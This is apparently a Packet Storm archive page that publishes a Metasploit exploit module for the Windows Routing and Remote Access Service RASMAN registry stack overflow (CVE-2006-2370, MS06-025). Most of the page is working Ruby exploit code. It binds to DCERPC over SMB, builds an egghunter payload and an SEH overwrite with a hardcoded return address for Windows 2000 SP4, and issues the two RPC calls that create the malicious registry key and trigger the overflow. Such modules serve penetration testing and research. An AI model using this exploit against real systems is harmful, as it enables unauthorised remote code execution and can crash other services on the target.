what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Microsoft RRAS Service RASMAN Registry Overflow

Microsoft RRAS Service RASMAN Registry Overflow
Posted Nov 26, 2009
Authored by H D Moore, Pusscat | Site metasploit.com

This Metasploit module exploits a registry-based stack overflow in the Windows Routing and Remote Access Service. Since the service is hosted inside svchost.exe, a failed exploit attempt can cause other system services to fail as well. A valid username and password is required to exploit this flaw on Windows 2000. When attacking XP SP1, the SMBPIPE option needs to be set to 'SRVSVC'. Exploiting this flaw involves two distinct steps - creating the registry key and then triggering an overwrite based on a read of this key. Once the key is created, it cannot be recreated. This means that for any given system, you only get one chance to exploit this flaw. Picking the wrong target will require a manual removal of the following registry key before you can try again: HKEY_USERS\\\\.DEFAULT\\\\Software\\\\Microsoft\\\\RAS Phonebook

tags | exploit, remote, overflow, registry
systems | windows
advisories | CVE-2006-2370
SHA-256 | 23ee569235c3874d89c2c84da0e57b5ca0d9fd9d118297399485cee1eebf336b

Microsoft RRAS Service RASMAN Registry Overflow

Change Mirror Download
##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# https://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

include Msf::Exploit::Remote::Egghunter
include Msf::Exploit::Remote::DCERPC
include Msf::Exploit::Remote::SMB

def initialize(info = {})
super(update_info(info,
'Name' => 'Microsoft RRAS Service RASMAN Registry Overflow',
'Description' => %q{
This module exploits a registry-based stack overflow in the Windows Routing
and Remote Access Service. Since the service is hosted inside svchost.exe,
a failed exploit attempt can cause other system services to fail as well.
A valid username and password is required to exploit this flaw on Windows 2000.
When attacking XP SP1, the SMBPIPE option needs to be set to 'SRVSVC'.
Exploiting this flaw involves two distinct steps - creating the registry key
and then triggering an overwrite based on a read of this key. Once the key is
created, it cannot be recreated. This means that for any given system, you
only get one chance to exploit this flaw. Picking the wrong target will require
a manual removal of the following registry key before you can try again:
HKEY_USERS\\.DEFAULT\\Software\\Microsoft\\RAS Phonebook
},
'Author' => [ 'pusscat', 'hdm' ],
'License' => BSD_LICENSE,
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2006-2370' ],
[ 'OSVDB', '26437' ],
[ 'BID', '18325' ],
[ 'MSB', 'MS06-025' ]
],
'Privileged' => true,
'DefaultOptions' =>
{
'EXITFUNC' => 'thread'
},
'Payload' =>
{
'Space' => 512,
'BadChars' => "\x00\x2c\x5c\x2e\x3a\x24",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows 2000 SP4', { 'Ret' => 0x750217ae } ], # call esi
],
'DefaultTarget' => 0))
register_options(
[
OptString.new('SMBPIPE', [ true, "Rawr.", 'router']),
], self.class)
end

# Post authentication bugs are rarely useful during automation
def autofilter
false
end

def exploit
connect()
smb_login()
print_status("Trying target #{target.name}...")

# Generate the egghunter payload
hunter = generate_egghunter()
egg = hunter[1]

# Pick a "filler" character that we know doesn't get mangled
# by the wide string conversion routines
filset = "\xc1\xff\x67\x1b\xd3\xa3\xe7"
fil = filset[ rand(filset.length) ].chr

# Bind to the actual DCERPC interface
handle = dcerpc_handle('20610036-fa22-11cf-9823-00a0c911e5df', '1.0', 'ncacn_np', ["\\#{datastore['SMBPIPE']}"])
print_status("Binding to #{handle}")
dcerpc_bind(handle)
print_status("Bound to #{handle}")

# Add giant blocks of guard data before and after the egg
eggdata =
fil * 1024 +
egg +
egg +
payload.encoded +
fil * 1024

# Place the egghunter where ESI happens to point
bof = (fil * 178)
bof[84, hunter[0].length] = hunter[0]

# Overwrite the SEH ptr, even though ESP is smashed
# The handle after the ret must be an invalid address
pat =
(fil * 886) +
NDR.long(target.ret) +
(fil * 3) + "\xc0" +
bof

type2 =
NDR.string( (fil * 1024) + "\x00" ) +
NDR.string( pat + "\x00" ) +
NDR.string( (fil * 4096) + "\x00" ) +
NDR.long(rand(0xffffffff)) +
NDR.long(rand(0xffffffff))

type1 =
NDR.long(rand(0xffffffff)) + # OperatorDial
NDR.long(rand(0xffffffff)) + # PreviewPhoneNumber
NDR.long(rand(0xffffffff)) + # UseLocation
NDR.long(rand(0xffffffff)) + # ShowLights
NDR.long(rand(0xffffffff)) + # ShowConnectStatus
NDR.long(rand(0xffffffff)) + # CloseOnDial
NDR.long(rand(0xffffffff)) + # AllowLogonPhonebookEdits
NDR.long(rand(0xffffffff)) + # AllowLogonLocationEdits
NDR.long(rand(0xffffffff)) + # SkipConnectComplete
NDR.long(rand(0xffffffff)) + # NewEntryWizard
NDR.long(rand(0xffffffff)) + # RedialAttempts
NDR.long(rand(0xffffffff)) + # RedialSeconds
NDR.long(rand(0xffffffff)) + # IdleHangUpSeconds
NDR.long(rand(0xffffffff)) + # RedialOnLinkFailure
NDR.long(rand(0xffffffff)) + # PopupOnTopWhenRedialing
NDR.long(rand(0xffffffff)) + # ExpandAutoDialQuery
NDR.long(rand(0xffffffff)) + # CallbackMode

NDR.long(0x45) + type2 + # Parsed by CallbackListFromRpc
NDR.wstring("\x00" * 129) +
NDR.long(rand(0xffffffff)) +
NDR.wstring("\x00" * 520) +
NDR.wstring("\x00" * 520) +

NDR.long(rand(0xffffffff)) +
NDR.long(rand(0xffffffff)) +
NDR.long(rand(0xffffffff)) +
NDR.long(rand(0xffffffff)) +
NDR.long(rand(0xffffffff)) +
NDR.long(rand(0xffffffff)) +
NDR.long(rand(0xffffffff)) +
NDR.long(rand(0xffffffff)) +

NDR.string("\x00" * 514) +

NDR.long(rand(0xffffffff)) +
NDR.long(rand(0xffffffff))

stubdata =
type1 +
NDR.long(rand(0xffffffff)) +
eggdata

print_status('Stub is ' + stubdata.length.to_s + ' bytes long.')

begin
print_status('Creating the malicious registry key...')
response = dcerpc.call(0xA, stubdata)

print_status('Triggering the base pointer overwrite...')
response = dcerpc.call(0xA, stubdata)

rescue Rex::Proto::DCERPC::Exceptions::NoResponse
end

handler
disconnect
end

end
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    0 Files
  • 12
    Nov 12th
    0 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close